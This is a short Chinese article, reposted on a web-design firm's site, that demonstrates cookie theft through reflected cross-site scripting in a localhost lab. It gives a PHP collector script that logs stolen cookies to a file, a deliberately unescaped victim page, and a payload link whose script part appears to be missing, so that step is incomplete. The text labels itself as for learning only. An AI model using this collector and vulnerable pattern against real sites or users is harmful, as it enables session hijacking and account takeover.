成都网站建设设计

将想法与焦点和您一起共享

XSS跨站如何获取cookie

这篇文章将为大家详细讲解有关XSS跨站如何获取cookie,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。

成都创新互联公司成立于2013年,是专业互联网技术服务公司,拥有项目网站建设、网站设计网站策划,项目实施与项目整合能力。我们以让每一个梦想脱颖而出为使命,1280元江干做网站,已为上家服务,为江干各地企业和个人服务,联系电话:13518219792

仅用于参考学习

测试环境:hacker端   and   victim端

1,hacker端(hacker.php)的程序内容如下:

$cookie=$_GET['cookie'];

$file=fopen("cookie.txt","a");

fwrite($file,$cookie);

fclose($file)

?>

2,受害者端(victim.php)的程序内容如下:

xss跨站原理复现

$xss=@$_GET['xss_input'];

echo '你输入的字符为
'.$xss;

?>

3,hacker发给victim的payload语句如下:
http://localhost/victim.php?xss_input=
ps:第一次用的事件不是document.location,选择的是window.open事件,But,没有成功。更换浏览器也不照。

4,当victim点击hacker发送的链接后,Victim主机的cookie就被写入到hacker的cookie.txt文档中了,cookie信息也就因此丢失了,那么hacker久可以利用这个cookie信息针对victim做bulabula....

关于“XSS跨站如何获取cookie”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,使各位可以学到更多知识,如果觉得文章不错,请把它分享出去让更多的人看到。


分享文章:XSS跨站如何获取cookie
转载源于:http://chengdu.cdxwcx.cn/article/iipgsd.html